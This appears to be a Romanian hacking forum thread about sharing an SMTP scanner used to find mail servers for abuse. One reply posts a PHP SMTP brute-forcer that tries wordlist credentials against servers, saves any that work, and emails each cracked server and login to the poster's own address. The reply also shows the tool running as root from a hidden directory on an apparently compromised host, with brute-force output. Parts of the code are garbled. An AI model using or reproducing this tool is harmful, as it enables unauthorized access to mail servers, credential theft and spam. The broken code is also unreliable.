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Scanner SMTP free, o varianta buna

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Aveti un ReadMe acolo. Este destul de usor de folosit, eu am intampinat greutati doar la gasirea unui root bun. Editati mail, etc.

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ps - am observat ca pe site nu prea multumeste nimeni nimanui, asa ca nu astept multumiri.

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Chiar nimeni nu il ia? este scannerul vandut pe site cu 300 euro.. ala cu 1 smtp pe minut :) bineinteles nu este adevarat, insa prinde de prins multumitor. E misto ca le si verifica, si trimite mail cu smtp ul respectiv, PRIN el. Nu are mails ascunse, etc, totusi rog sa il verificati inainte de folosire.

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Chiar nimeni nu il ia? este scannerul vandut pe site cu 300 euro.. ala cu 1 smtp pe minut :) bineinteles nu este adevarat, insa prinde de prins multumitor. E misto ca le si verifica, si trimite mail cu smtp ul respectiv, PRIN el. Nu are mails ascunse, etc, totusi rog sa il verificati inainte de folosire.

Si de unde sti tu ca nu il ia nimeni?

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romanu .. dar este asa de simplu sa verifici daca este un mail ascuns pe undeva..ce dreaq.. am zis sa fac public un scanner bun de smtp uri, si tot eu sunt ala acuzat de ...sa zicem "furaciune" . Pacat. totusi daca gasesti un mail ascuns, ceva, te rog posteaza aici.. inseamna ca merit ban permanent. Cand am spus : chiar nu il ia nimeni, ma refeream la un simplu "tnx man" pe aici.

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Te-ai complicat enorm. Puteai extrage doar ce-ti trebuie din phpmailer.



$_UserFile = "user.file";
$_PassFile = "pass.file";

function S_Server($_server, $_username, $_password) {
print "[+]Found $_username/$_password on $_server\r\n";

if(!($_OutFile = fopen("cracked.smtp", "a"))) ExitF ("Cannot open the lo g file");
fputs($_OutFile, "[+]Cracked: $_server $_username $_password\r\n");

function ExitF($errmsg) {
print "[-]" . $errmsg . "\r\n";

function CrackSMTP($server, $username, $password) {
$socket = fsockopen($server, 25, $errno, $errstr, 2);

if (!$socket) ExitF ("SOCKET ERROR!");

stream_set_timeout($socket, 2);
$_SockResult = fgets($socket, 512);

if (substr(trim($_SockResult), 0, 3) != "220") ExitF ("220 Error");

fputs($socket, "EHLO USER\r\n");

$_SockResult = fgets($socket, 512);
while(substr(trim($_SockResult), 0, 4) == "250-") $_SockResult = fgets($ socket, 512);

fputs($socket, "AUTH LOGIN\r\n");

if (!($_SockResult = fgets($socket, 512))) ExitF ("AUTH LOGIN Error");
if (substr(trim($_SockResult), 4, 16) != "VXNlcm5hbWU6") ExitF ("RECEIVE USER PROMPT Error");

$Encrypt_User = base64_encode($username);
fputs($socket, "$Encrypt_User\r\n");

if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND USER Error");
if (substr(trim($_SockResult), 4, 16) != "UGFzc3dvcmQ6") ExitF ("RECEIVE PASSWORD PROMPT Error");

$Encrypt_Password = base64_encode($password);
fputs($socket, "$Encrypt_Password\r\n");

if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND PASSWORD Error") ;
if (substr(trim($_SockResult), 0, 3) != "235") {
print "$server: $username/$password - INVALID\r\n";
return "INVALID";

fputs($socket, "RSET\r\n");
if (!($_SockResult = fgets($socket, 512))) ExitF ("RSET Error");

fputs($socket, "MAIL FROM: admin@xoffice.com\r\n");
if (!($_SockResult = fgets($socket, 512))) ExitF ("MAIL FROM Error");

fputs($socket, "RCPT TO: galford@inbox.com\r\n");
if (!($_SockResult = fgets($socket, 512))) ExitF ("RCPT TO Error");

fputs($socket, "DATA\r\n");
if (!($_SockResult = fgets($socket, 512))) ExitF ("DATA Error");

fputs($socket, "Content-Type: text/html\r\n");
fputs($socket, "SUBJECT: Elite Server $server $username $password\r\n");
fputs($socket, "FROM: SMTP Admin <admin@xoffice.com>\r\n");
fputs($socket, "TO: galford@inbox.com\r\n");
fputs($socket, "\r\n Happy New Year\r\n $server $username $password\r\n. \r\n");
fputs($socket, "QUIT\r\n");


S_Server ($server, $username, $password);


if (!($_SRV = $argv[1])) ExitF ("Usage: $argv[0] <hostname>");
if (!($F_UserFile = fopen($_UserFile, "r"))) ExitF ("Cannot open the username fi le");

$_Var = 0;
$_Counter = 0;

while (!feof($F_UserFile)) {

$_username = fgets($F_UserFile, 64);
$username = str_replace("\n", "", $_username);

if ($username != "") {

$user[$_Var] = $username;
$pass[$_Var] = $username;
$_Counter = $_Counter + 1;

$user[$_Var] = $username;
$pass[$_Var] = $username . "1";
$_Counter = $_Counter + 1;

$user[$_Var] = $username;
$pass[$_Var] = $username . "12";
$_Counter = $_Counter + 1;

$user[$_Var] = $username;
$pass[$_Var] = $username . "123";
$_Counter = $_Counter + 1;

if (!($F_PassFile = fopen($_PassFile, "r"))) ExitF ("Cannot open the password file");

while (!feof($F_PassFile)) {
$user[$_Var] = $username;
$pass[$_Var] = fgets($F_PassFile, 64);
$pass[$_Var] = str_replace("\n", "", $pass[$_Var]);



fclose ($F_UserFile);

for ( $_Var = 0; $_Var < $_Counter; $_Var++ ) CrackSMTP($_SRV, $user[$_Var], $pa ss[$_Var]);


Incearca procedurea asta. E mai clean si nu face load average absolut deloc.

root@admin [/dev/shm/.img]# ps -eaf | grep -c smtp.php


root@admin [/dev/shm/.img]#

Uite la 99 procese pornite ce load average:

root@admin [/dev/shm/.img]# w

20:42:21 up 1 day, 3 min, 2 users, load average: 0.37, 0.50, 0.68

SMTP brute-ul meu arata ceva de genul in action: antonio/letmein - INVALID test/mypass - INVALID henry/1234567 - INVALID charles/charles - INVALID online/online - INVALID spam/secret - INVALID patrick/letmein - INVALID gary/secret - INVALID benjamin/12345678 - INVALID test/123456789 - INVALID henry/password - INVALID randy/123456789 - INVALID roger/roger - INVALID billy/billy123 - INVALID

Edited by galford
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